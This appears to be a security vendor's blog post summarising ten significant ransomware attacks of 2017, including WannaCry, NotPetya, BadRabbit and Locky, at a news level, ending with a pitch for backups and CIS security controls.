Ransomware had a good year in 2017. For the first time ever, we saw several “cryptoworm” variants self-propagate across vulnerable workstations around the world. We also witnessed more traditional ransomware families cause remarkable damage to victimized organizations as well as strains that embraced novel tools and techniques.
Here are 10 of the most significant ransomware attacks from the past year. (For the purposes of this article, “most significant” does not account only for the number of users affected. It also takes into account other factors such as distribution, costs, updates, and potential damages for future victims.)
On 26 July 2017, Arkansas Oral & Facial Surgery Center suffered an attack at the hands of an unknown ransomware. The incident didn’t affect its patient database. However, it did affect imaging files like X-rays along with other documents such as email attachments. It also rendered patient data pertaining to appointments that occurred three weeks prior to the attack inaccessible.
At the time of discovery in September 2017, Arkansas Oral & Facial Surgery could not determine whether the ransomware attackers accessed any patients’ personal or medical data. It therefore decided to notify 128,000 customers of the attack and set them up with a year of free credit-monitoring services.
Emsisoft security researcher xXToffeeXx detected a new ransomware threat called Reyptson back in July 2017. Upon successful infection, Reyptson checks to see if Mozilla’s Thunderbird email client is installed on the computer. If it is, the ransomware attempts to read the victim’s email credentials and contact list.
The threat isn’t interested in viewing this data to compromise the victim’s privacy. Instead it leverages those contacts to conduct a spam distribution campaign from the victim’s computer. Each of those spam messages comes with a fake invoice document that contains an executable responsible for loading up the ransomware.
McAfee’s research team detected “Android/Ransom.LeakerLocker.A!Pkg,” also known as LeakerLocker, back in July 2017. They found it hiding inside of two Android applications: Booster & Cleaner Pro, an app which had 5,000 installs at the time of discovery, and Wallpapers Blur HD, a program with 10,000 installs.
LeakerLocker doesn’t encrypt an infected device’s files. Unlike other Android-based ransomware, it locks the home screen and claims to access the device’s email addresses, contacts, Chrome history, text messages and calls, pictures, and device information. The threat then displays this information in a WebView and demands $50 in payment if the victim doesn’t want their data shared with all of their phone contacts.
In April 2017, Panda Security’s researchers discovered a new type of ransomware that they nicknamed “What You See Is What You Encrypt,” or “WYSIWYE.” The digital threat comes with an interface that an attacker can use to configure their preferences, including the email address that will appear in the ransom note that is sent to the victim. From that interface, they can also go after certain network computers, target specific files, and enter stealth mode.
The threat attacks a computer via a Remote Desktop Protocol (RDP) brute force attack. This type of intrusion oftentimes involves scanning the web for open RDP servers. If they find one, attackers use a tool to try hundreds of thousands of password combinations to steal the RDP credentials. They then deploy WYSIWYE onto the targeted network computer.
On 12 December 2016, the Cockrell Hill Police Department in Dallas, Texas learned of a security incident in which a computer virus affected one of its servers. The infection, which the police department contained to a single server, occurred when an employee received spam mail from an email address imitating a department-issued email address.
The Cockrell Hill Police Department traced the infection to a virus known as “Osiris,” which could be in reference to one variant of Locky ransomware. Osiris encrypted Microsoft Office and Excel documents as well as all body camera video, some in-car video, some in-house surveillance video, and some photographs dating back to 2009. It then demanded 4,000 USD in Bitcoin. Cockrell Hill’s police recovered the documents off CDs and DVDs, but without comprehensive data backups, they lost access to the affected video and photographs.
Cerber is one of the heavy-hitters in the ransomware sphere. It’s also one of the most prolific crypto-malware threats. Indeed, Microsoft detected more enterprise PCs infected with Cerber than any other ransomware family over the 2016-17 holiday season.
Bad actors have outfitted Cerber with new tactics and techniques since then. Malwarebytes observed one such modification in August 2017 with respect to a campaign that begins with Magnitude Exploit Kit. Upon successful exploitation of a hard-coded vulnerability, Magnitude loads a variant of Cerber that uses binary padding to artificially increase its size and thereby skirt scanning restrictions imposed by most security software.
Since its discovery in February 2016, Locky and its ever–multiplying variants have relied on spam botnets like Necurs for distribution. The crypto-ransomware went dark in early 2017. However, it resurfaced in August with one of its largest campaigns yet: 23 million spam messages sent out over a 24-hour period.
Detected by AppRiver, the operation sent out emails containing subject lines like “pictures” and “documents” that bore a request to “download it here.” The emails come with a ZIP attachment that contains a Visual Basic Script (VBS) file. This file, in turn, pulls down Locky.
A week before Halloween, Kaspersky Lab revealed it had received “notifications of mass alerts” of a new ransomware targeting Ukrainian and Russian organizations. Some of the victims included Russian news media outlets Fontanka.ru and Interfax as well as Kiev’s metro system and an airport in Odessa. ESET researchers believe the ransomware also hit targets in Poland, South Korea, and the United States.
Kaspersky’s researchers ultimately identified the threat as BadRabbit. Unlike WannaCry and NotPetya, BadRabbit did not exploit a Microsoft vulnerability for distribution. Instead it used drive-by attacks to deliver the ransomware dropper, a smaller-scale operation which demanded 0.5 Bitcoins in ransom from only hundreds (not hundreds of thousands) of victims.
News of NotPetya first broke on 27 June when power distributors in Ukraine and the Netherlands confirmed hacking attacks that affected their systems. Not long afterwards, Ukraine’s government, the offices of multinationals in Spain, and the British advertising group WPP confirmed similar incidents. Researchers quickly traced the attacks to Petya, a form of ransomware which encrypts the Master Boot Record. They also observed how those newer variants were abusing the same EternalBlue vulnerability as exploited by WannaCry for distribution.
A closer look by Kaspersky Lab, however, revealed that Petya wasn’t actually involved in the worldwide campaign. The responsible malware borrowed large chunks of code from Petya, but it behaved as a wiper in that it offered no way for users to recover their affected data. For that reason, Kaspersky named the threat “NotPetya.”
On 12 May 2017, an updated version of WCry/WannaCry ransomware called “WanaCrypt0r 2.0” struckhospitals belonging to the United Kingdom’s National Health Service (NHS), internet service provider Telefonica, and other high-profile targets around the world. Each victim subsequently received a note demanding $300 in Bitcoin as ransom. As with other variants, however, meeting the WannaCry attackers’ demand didn’t guarantee that a victim would receive a decryption key for their affected files.
Researchers later determined that WannaCry made its rounds by exploiting EternalBlue, a vulnerability which Microsoft patched in a security bulletin in March 2017. It’s believed bad actors incorporated EternalBlue into WannaCry’s delivery and distribution mechanism after a band of criminals known as the Shadow Brokers leaked EternalBlue and other exploit code stolen from the Equation Group hacker collective onto the public web. In total, WannaCry affected more than 300,000 organizations worldwide.
SECURITY CONTROLS TO THE RESCUE!
In light of the attacks discussed above, it’s important that organizations everywhere make a resolution to strengthen their ransomware defenses in 2018. That decision should include implementing security controls. In particular, they should abide by CIS Control 10 and invest in data recovery capabilities such as reliable backups.
To learn how Tripwire’s products help promote CIS Control 10 and the Center for Internet Security’s 19 other critical security controls (CSCs), click here.